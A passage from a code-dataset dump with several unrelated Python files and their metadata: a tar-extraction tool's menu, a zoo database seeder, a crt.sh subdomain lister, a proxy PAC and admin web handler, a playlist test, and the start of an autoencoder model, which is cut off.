list all commands found inside the provided file\r\n if command == \"all\":\r\n print('Available commands: ' + LIGHT_CYAN + ', '.join(\r\n str(key) for key, value in commands_dict.items()) + CEND)\r\n # After listing all commands, ask the user to provide a desired command\r\n command = input(\"Enter a \" + LIGHT_CYAN + \"[specific command]\" + CEND + \": \")\r\n try:\r\n # Now try to find the mentioned command position to understand what are the important lines to print the output of the command\r\n current_line = commands_dict[command]\r\n\r\n # Next we will identify the line position of the next command\r\n next_key = None\r\n dict_iter = iter(commands_dict)\r\n for key in dict_iter:\r\n if key == command:\r\n next_key = next(dict_iter, None)\r\n \r\n # After finding the line position, we'll subtract one line, this line is exactly the next command line and we just want the output\r\n try:\r\n next_line = (commands_dict[next_key] - 1)\r\n # If the user is searching for the last command, we cannot expect to identify the important lines by finding the next command line\r\n except:\r\n next_line = last_line\r\n\r\n # Now that we have the important lines, we'll determine the range and print the output of the selected command\r\n output_interval = range(current_line, next_line)\r\n lines_to_read = list(output_interval)\r\n print(\"------------------------------------------------------------------------\")\r\n print(f\"Output for: {command}\")\r\n for position, line in enumerate(read_text):\r\n if position in lines_to_read:\r\n print(line.strip())\r\n print(\"------------------------------------------------------------------------\")\r\n except:\r\n # If the user provided an invalid command, inform it was not found and print similar commands by using a regex search\r\n print(LIGHT_RED + \"Command not found!\" + CEND)\r\n\r\n print('Similar commands: ' + LIGHT_CYAN + ', '.join(\r\n str(key) for key, value in commands_dict.items() if re.match(r\"\" + re.escape(command) + \".*\", key)) + CEND)\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n print(\"------------------------------------------------------------------------\")\r\n print(LIGHT_CYAN + '88888888888 d88888888888b. .d8888b. 888 888 .d88888b. .d88888b.8888888888888888888888888888b. ')\r\n print(' 888 d88888888 Y88b d88P Y88b888 888d88P\" \"Y88bd88P\" \"Y88b 888 888 888 Y88b ')\r\n print(CYAN + ' 888 d88P888888 888 Y88b. 888 888888 888888 888 888 888 888 888 ')\r\n print(' 888 d88P 888888 d88P \"Y888b. 8888888888888 888888 888 888 8888888 888 d88P ')\r\n print(LIGHT_BLUE + ' 888 d88P 8888888888P\" \"Y88b.888 888888 888888 888 888 888 8888888P\" ')\r\n print(BLUE + ' 888 d88P 888888 T88b \"888888 888888 888888 888 888 888 888 T88b ')\r\n print(' 888 d8888888888888 T88b Y88b d88P888 888Y88b. .d88PY88b. .d88P 888 888 888 T88b ')\r\n print(' 888 d88P 888888 T88b \"Y8888P\" 888 888 \"Y88888P\" \"Y88888P\" 888 8888888888888 T88b ' + CEND)\r\n print(\"------------------------------------------------------------------------\")\r\n while True:\r\n print(LIGHT_CYAN + \"TarShooter\" + CEND + \" can be run in two different modes: \" + LIGHT_CYAN + \"extract [1]\" + CEND + \" or \" + LIGHT_CYAN + \"read [2]\" + CEND + \".\")\r\n print(\"Select \" + LIGHT_CYAN + \"[1]\" + CEND + \" extract mode to extract a .gz file.\")\r\n print(\"Select \" + LIGHT_CYAN + \"[2]\" + CEND + \" to read the troubleshoot file.\")\r\n print(\"Select \" + LIGHT_CYAN + \"[3]\" + CEND + \" or press \" + LIGHT_CYAN + \"CTRL + C\" + CEND + \" at any time to exit.\")\r\n print(\"------------------------------------------------------------------------\")\r\n\r\n menu_option = input(\"Choose an option \" + LIGHT_CYAN + \"[1-3]\" + CEND + \": \")\r\n\r\n if menu_option == \"1\":\r\n print(\"You have selected\" + LIGHT_CYAN + \" [1] extract mode\" + CEND + \".\")\r\n print(\"------------------------------------------------------------------------\")\r\n file_path = input(\"File path: \")\r\n dest_dir = input(\"Destination directory: \")\r\n makedir(dest_dir)\r\n untar(file_path, dest_dir)\r\n\r\n if menu_option == \"2\":\r\n print(\"You have selected\" + LIGHT_CYAN + \" [2] read mode\" + CEND + \".\")\r\n print(\"------------------------------------------------------------------------\")\r\n work_dir = input(\"Please provide a path to the troubleshooting file: \")\r\n if os.path.isfile(work_dir):\r\n print(\"File \" + LIGHT_CYAN + work_dir + CEND + \" found!\")\r\n tshoot(work_dir)\r\n else:\r\n print(\"Could not locate the informed file. Please check the syntax.\")\r\n\r\n if menu_option == \"3\":\r\n os._exit(1)\r\n\r\n except KeyboardInterrupt:\r\n print(LIGHT_RED + \"\\nBreak sequence CTRL + C detected. Script will exit.\" + CEND)\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n", "repo_name": "RenanHingel/tarshooter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 58, "usage_type": "call"}, {"api_name": "cchardet.detect", "line_number": 60, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 165, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 170, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "29465212490", "text": "\nimport pandas as pd\nimport datetime as dt\nimport uuid\nimport random\nimport math\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.exc import OperationalError\n\nfrom .logger import get_logger\nfrom . helpers import generate_habitat_composite\n\nfrom config import Config\n\n\nmodule_logger = get_logger(__name__)\n\nengine = create_engine(\n Config.SQLALCHEMY_DATABASE_URI, \n convert_unicode=True,\n connect_args={\"check_same_thread\": False}\n )\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\n\ndef init_db(need_reset = False):\n if need_reset:\n drop_db()\n try: \n sql = f\"SELECT * FROM association_table_breed_food WHERE 1\"\n query = engine.execute(sql) \n _ = query.first()[0]\n except (OperationalError, TypeError) as ex: \n drop_db()\n Base.metadata.create_all(bind=engine) \n seed_db()\n\n\ndef seed_db():\n from .models import Food, Movement, Breed, Habitat, Cage, CageMeal, InitialDate\n module_logger.info('Seeding DB')\n\n f_m_dict = {\n 'food':['meat', 'milk', 'fish', 'insect', 'grass', 'vegetable', 'fruit', 'grain', 'plant', 'mixed', 'granulated'],\n 'movement':['fly', 'swim', 'walk', 'crawl','jump']\n }\n \n food_types_dic = {\n 'meat':'chicken', 'milk':'condesed milk', 'fish':'salmon', 'insect':'fly', 'grass':'cynodon dactylon', \n 'vegetable':'paprika', 'fruit':'apple', 'grain':'soy', 'plant':'algae', 'mixed':'mixed', 'granulated':'granulated'\n }\n for key in f_m_dict.keys():\n \n if key == 'food':\n df = pd.DataFrame({'food_type':f_m_dict[key]}) \n df['food_name'] = df['food_type'].apply(lambda x: food_types_dic[x]) \n df['energy'] = df['food_name'].apply(lambda x: random.randint(1,5000)) \n else:\n df = pd.DataFrame({'movement_name':f_m_dict[key]})\n\n df.to_sql(\n key,\n con=engine,\n if_exists='append',\n chunksize=1000,\n index=False\n )\n\n breed_seed_df = pd.read_csv('breeds.csv')\n for _, row in breed_seed_df.iterrows():\n db_habitats_composites = [x[0] for x in db_session.query(Habitat.composite_id).all()]\n habitat_tokens = row.habitat.split(';')\n curr_notes = habitat_tokens[9] \n curr_composite = generate_habitat_composite(habitat_tokens[:-1]) \n if curr_composite in db_habitats_composites:\n curr_breed_habitat = Habitat.query.filter(Habitat.composite_id == curr_composite).first()\n else:\n curr_breed_habitat = Habitat(\n min_air_volume = habitat_tokens[0],\n min_water_volume = habitat_tokens[1],\n min_surface_area = habitat_tokens[2],\n min_temperature = habitat_tokens[3], \n max_temperature = habitat_tokens[4], \n min_humidity = habitat_tokens[5],\n max_humidity = habitat_tokens[6],\n min_uv_index = habitat_tokens[7],\n max_uv_index = habitat_tokens[8],\n composite_id = curr_composite,\n habitat_notes = curr_notes,\n )\n curr_breed_habitat.save() \n random_animals_count_per_cage = random.randrange(1,40)\n cage_habitat = Habitat(\n min_air_volume = float(curr_breed_habitat.min_air_volume) * random_animals_count_per_cage,\n min_water_volume = float(curr_breed_habitat.min_water_volume) * random_animals_count_per_cage,\n min_surface_area = float(curr_breed_habitat.min_surface_area) * random_animals_count_per_cage,\n min_temperature = curr_breed_habitat.min_temperature,\n max_temperature = curr_breed_habitat.max_temperature,\n min_humidity = curr_breed_habitat.min_humidity,\n max_humidity = curr_breed_habitat.max_humidity,\n min_uv_index = curr_breed_habitat.min_uv_index,\n max_uv_index = curr_breed_habitat.max_uv_index,\n composite_id = '0',\n habitat_notes = curr_notes,\n )\n cage_composite = generate_habitat_composite(\n [\n cage_habitat.min_air_volume,\n cage_habitat.min_water_volume,\n cage_habitat.min_surface_area,\n cage_habitat.min_temperature,\n cage_habitat.max_temperature,\n cage_habitat.min_humidity,\n cage_habitat.max_humidity,\n cage_habitat.min_uv_index,\n cage_habitat.max_uv_index, \n ]\n )\n db_cage_habitat = Habitat.query.filter(Habitat.composite_id == cage_composite).first()\n if db_cage_habitat:\n cage_habitat = db_cage_habitat\n else:\n cage_habitat.save()\n length = random.randrange(30,50) \n height = random.randrange(2,7) \n width = math.ceil(cage_habitat.min_surface_area / length)\n cage = Cage(\n habitat_id = cage_habitat.id,\n inventory_id = uuid.uuid4().hex,\n cage_name = None,\n curr_temperature = random.randrange(int(curr_breed_habitat.min_temperature), int(curr_breed_habitat.max_temperature)), \n width = width,\n length = length,\n height = height,\n cage_notes = None\n )\n cage.save()\n\n curr_breed = Breed(\n breed_name = str(row['name']).lower(),\n species = str(row.species).lower(),\n min_weight = row.min_weight,\n min_body_temp = row.min_body_temp,\n max_body_temp = row.max_body_temp,\n min_food_energy_intake = row.min_food_energy_intake,\n max_food_energy_intake = row.max_food_energy_intake,\n is_cold_blooded = row.is_cold_blooded,\n is_predator = row.is_predator,\n breed_notes = None \n ) \n\n for food_type in row.food.split(';'):\n db_food = Food.query.filter(Food.food_type == str(food_type).lower()).first()\n curr_breed.breed_foods.append(db_food)\n cage_meal = CageMeal(\n cage_id = cage.id,\n food_id = db_food.id,\n cage_meal_qty = random.randint(1,100)\n )\n cage_meal.save()\n\n\n for movement in row.movement.split(';'):\n db_movement = Movement.query.filter(Movement.movement_name == str(movement).lower()).first()\n curr_breed.movements.append(db_movement)\n \n curr_breed_habitat.breeds.append(curr_breed) \n curr_breed.save() \n\n\n animal_seed_df = pd.read_csv('animals.csv')\n animal_seed_df['id'] = animal_seed_df.index + 1\n animal_seed_df['personal_id'] = [uuid.uuid4().hex for _ in range(len(animal_seed_df))] \n animal_seed_df['inserted_at'] = dt.datetime.utcnow()\n animal_seed_df['updated_at'] = dt.datetime.utcnow()\n animal_seed_df.to_sql(\n 'animal',\n con=engine,\n if_exists='append',\n chunksize=1000,\n index=False\n )\n InitialDate(initial_date = dt.datetime.utcnow()).save()\n\n \n \n\ndef drop_db():\n module_logger.info('Dropping DB')\n Base.metadata.drop_all(bind=engine)\n\n", "repo_name": "morskibg/zoo", "sub_path": "app/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 7547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logger.get_logger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 20, "usage_type": "call"}, {"api_name": "config.Config.SQLALCHEMY_DATABASE_URI", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.scoped_session", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 40, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Habitat.composite_id", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 78, "usage_type": "name"}, {"api_name": "helpers.generate_habitat_composite", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Habitat.query.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Habitat.query", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Habitat.composite_id", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 85, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Habitat", "line_number": 100, "usage_type": "call"}, {"api_name": "helpers.generate_habitat_composite", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Habitat.query.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Habitat.query", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 126, "usage_type": "name"}, {"api_name": "models.Habitat.composite_id", "line_number": 126, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 131, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 132, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Cage", "line_number": 134, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 136, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Breed", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Food.query.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "models.Food.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.Food", "line_number": 160, "usage_type": "name"}, {"api_name": "models.Food.food_type", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.CageMeal", "line_number": 162, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 165, "usage_type": "call"}, {"api_name": "models.Movement.query.filter", "line_number": 171, "usage_type": "call"}, {"api_name": "models.Movement.query", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Movement", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Movement.movement_name", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 178, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 181, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 181, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 182, "usage_type": "attribute"}, {"api_name": "models.InitialDate", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}]} +{"seq_id": "2595308143", "text": "# -*- coding: utf-8 -*-\n# @Author : 90sec.com\n# @Tools : Pycharm\nprint(\"\"\"\n+++++++++++++++++++++++++++++++++++++++++++\n______ _ _ _____ _____ _ +\n| ___(_) | | / ___/ ___| | +\n| |_ _ _ __ __| | \\ `--.\\ `--.| | +\n| _| | | '_ \\ / _` | `--. \\`--. | | +\n| | | | | | | (_| | /\\__/ /\\__/ | |____ +\n\\_| |_|_| |_|\\__,_| \\____/\\____/\\_____/ +\n +\n+++++++++++++++++++++++++++++++++++++++++++ \n\"\"\")\n\nimport requests\nimport re\nimport sys\nimport os\n\nTIME_OUT = 60\ndef get_SSL(domain):\n domains = []\n url = 'https://crt.sh/?q=%25.{}'.format(domain)\n response = requests.get(url,timeout = TIME_OUT)\n ssl = re.findall(\"(.*?).{}\".format(domain),response.text)\n for i in ssl:\n i += '.' + domain\n domains.append(i+'\\n')\n fileurl = open('url.txt','w')\n for i in domains:\n fileurl.write(i)\n fileurl.write('\\n')\n fileurl.close()\n file = os.path.exists('url.txt')\n filesize = os.path.getsize('url.txt')\n if file and (filesize > 0):\n print(\"Ok!\")\n else:\n print(\"false\")\nif __name__ == '__main__':\n result = sys.argv[1]\n get_SSL(result)", "repo_name": "theblackjoker/diytools", "sub_path": "findssl/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "37313319704", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015年1月11日\n\n@author: dxw\n'''\nfrom gittornado import BaseHandler\nimport tornado\nimport DDDProxyConfig\nfrom DDDProxy import domainConfig\nfrom DDDProxy.hostParser import parserUrlAddrPort, getDomainName\nimport json\nimport httplib\n\nclass DDDProxyBaseHandler(BaseHandler):\n\t\n\tdef getRequestHost(self):\n\t\taddrPort = parserUrlAddrPort(self.request.protocol + \"://\" + self.request.host);\n\t\treturn addrPort[0]\n\tdef get_template_path(self):\n\t\treturn \"./template/\";\n\nclass pacHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\tself.set_header(\"Content-Type\", \"application/javascript\")\n\t\tself.render(\"pac.js\", proxy_ddr=\"%s:%d\" % (self.getRequestHost(), DDDProxyConfig.localServerProxyListenPort),\n\t\t\t\tdomainList=domainConfig.config.getDomainOpenedList())\n\nclass helpHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\tpacAddrOrigin = \"%s://%s/pac\"%(self.request.protocol,self.request.host)\n\t\tself.render(\"fq_temp.html\", info=\"\", pacAddr=pacAddrOrigin,pacAddrOrigin=pacAddrOrigin)\nclass adminHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\topt = self.get_argument('opt',\"\").encode('utf8')\n\t\tif opt == \"\":\n\t\t\tself.render(\"admin_temp.html\")\n\t\telse:\n\t\t\tif opt == \"puturl\":\n\t\t\t\taddr,port = parserUrlAddrPort(self.get_argument(\"url\").encode('utf8'))\n\t\t\t\tif addr:\n\t\t\t\t\tdomain = getDomainName(addr)\n\t\t\t\t\tif domainConfig.config.addDomain(domain):\n\t\t\t\t\t\tdomainConfig.config.save()\n\t\t\t\tself.redirect(\"/admin\", False)\n\t\t\telse:\n\t\t\t\tdomain = self.get_argument(\"domain\",default=\"\").encode('utf8')\n\t\t\t\tok = False\n\t\t\t\tif opt == \"delete\":\n\t\t\t\t\tok = domainConfig.config.removeDomain(domain)\n\t\t\t\telif opt == \"close\":\n\t\t\t\t\tok = domainConfig.config.closeDomain(domain)\n\t\t\t\telif opt == \"open\":\n\t\t\t\t\tok = domainConfig.config.openDomain(domain)\n\t\t\t\tif ok:\n\t\t\t\t\tdomainConfig.config.save()\n\t\t\t\tself.redirect(\"/admin\", False)\n\t\n\t@tornado.web.asynchronous\n\tdef post(self):\n\t\tpostJson = json.loads(self.request.body)\n\t\tdata = None\n\t\topt = postJson[\"opt\"]\n\t\tif opt==\"domainList\":\n\t\t\tdata=domainConfig.config.getDomainListWithAnalysis()\n\t\telif opt == \"analysisDataList\":\n\t\t\tdata=domainConfig.analysis.getAnalysisData(postJson[\"domain\"],postJson[\"startTime\"])\n\t\telif opt == \"domainDataList\":\n\t\t\tdata = domainConfig.analysis.getTodayDomainAnalysis()\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.write(json.dumps(data))\n\t\tself.finish()\n", "repo_name": "chintj/DDDProxy", "sub_path": "DDDProxy/webHandler.py", "file_name": "webHandler.py", "file_ext": "py", "file_size_in_byte": 2447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "gittornado.BaseHandler", "line_number": 16, "usage_type": "name"}, {"api_name": "DDDProxy.hostParser.parserUrlAddrPort", "line_number": 19, "usage_type": "call"}, {"api_name": "DDDProxyConfig.localServerProxyListenPort", "line_number": 28, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig.config.getDomainOpenedList", "line_number": 29, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 29, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 29, "usage_type": "name"}, {"api_name": "tornado.web", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 32, "usage_type": "attribute"}, {"api_name": "DDDProxy.hostParser.parserUrlAddrPort", "line_number": 44, "usage_type": "call"}, {"api_name": "DDDProxy.hostParser.getDomainName", "line_number": 46, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config.addDomain", "line_number": 47, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 47, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 47, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.save", "line_number": 48, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 48, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 48, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.removeDomain", "line_number": 54, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 54, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.closeDomain", "line_number": 56, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 56, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 56, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.openDomain", "line_number": 58, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 58, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 58, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.save", "line_number": 60, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 60, "usage_type": "name"}, {"api_name": "tornado.web", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config.getDomainListWithAnalysis", "line_number": 69, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 69, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 69, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.analysis.getAnalysisData", "line_number": 71, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.analysis", "line_number": 71, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 71, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.analysis.getTodayDomainAnalysis", "line_number": 73, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.analysis", "line_number": 73, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 73, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "tornado.web", "line_number": 63, "usage_type": "attribute"}]} +{"seq_id": "24115523408", "text": "import pytest\nfrom src.funciones.unirCancionYLugar import unirCancionYlugar\n\n\n@pytest.mark.unirCancionYLugar\ndef test_unirCancionYLugar():\n \n playlistRandom = {2: 'California Uber Alles', 1: \"Elvis' Flaming Star\", 3: 'King Kunta', 4: 'Against the moon', 5: 'Headless'}\n\n lugarCancion = {'California Uber Alles': '.\\\\libreria\\\\California_Uber_Alles.mp3', \"Elvis' Flaming Star\": \".\\\\libreria\\\\Elvis' Flaming Star.flac\", 'King Kunta': '.\\\\libreria\\\\King_Kunta.mp3', 'Against the moon': '.\\\\libreria\\\\against the moon.mp3', 'Headless': '.\\\\libreria\\\\Headless.mp3'}\n\n\n assert (unirCancionYlugar(playlistRandom, lugarCancion)) == {2: {'California Uber Alles': '.\\\\libreria\\\\California_Uber_Alles.mp3'}, 1: {\"Elvis' Flaming Star\": \".\\\\libreria\\\\Elvis' Flaming Star.flac\"}, 3: {'King Kunta': '.\\\\libreria\\\\King_Kunta.mp3'}, 4: {'Against the moon': '.\\\\libreria\\\\against the moon.mp3'}, 5: {'Headless': '.\\\\libreria\\\\Headless.mp3'}}\n\n", "repo_name": "ClearCB/proyect-vlc-shuffle", "sub_path": "test/test_unirCancionYLugar.py", "file_name": "test_unirCancionYLugar.py", "file_ext": "py", "file_size_in_byte": 937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src.funciones.unirCancionYLugar.unirCancionYlugar", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "26629153621", "text": "from abc import abstractmethod\nfrom dataclasses import dataclass\nfrom typing import Generic, List, Tuple, Type\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom mohou.model.common import LossDict, ModelBase, ModelConfigBase\nfrom mohou.types import ImageBase, ImageT\n\n\n@dataclass\nclass AutoEncoderConfig(ModelConfigBase):\n image_type: Type[ImageBase]\n n_bottleneck: int = 16\n n_pixel: int = 112\n\n def __post_init__(self):\n # validation\n assert self.n_pixel in [28, 112, 224]\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view(self.shape)\n\n\ndef create_encoder_decoder_layers(\n n_channel: int, n_pixel: int, n_bottleneck: int\n) -> Tuple[List[nn.Module], List[nn.Module]]:\n assert n_pixel in [28, 112, 224]\n\n if n_pixel == 224:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 3, padding=1, stride=(2, 2)), # 112x112\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 56x56\n nn.ReLU(inplace=True),\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 28x28\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, 3, padding=1, stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 256, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True),\n nn.Flatten(),\n nn.Linear(256 * 16, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, 256 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 256, 4, 4),\n nn.ConvTranspose2d(256, 128, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n elif n_pixel == 112:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 3, padding=1, stride=(2, 2)), # 56x56\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 28x28\n nn.ReLU(inplace=True),\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True),\n nn.Flatten(),\n nn.Linear(128 * 16, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, 128 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 128, 4, 4),\n nn.ConvTranspose2d(128, 64, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n else:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 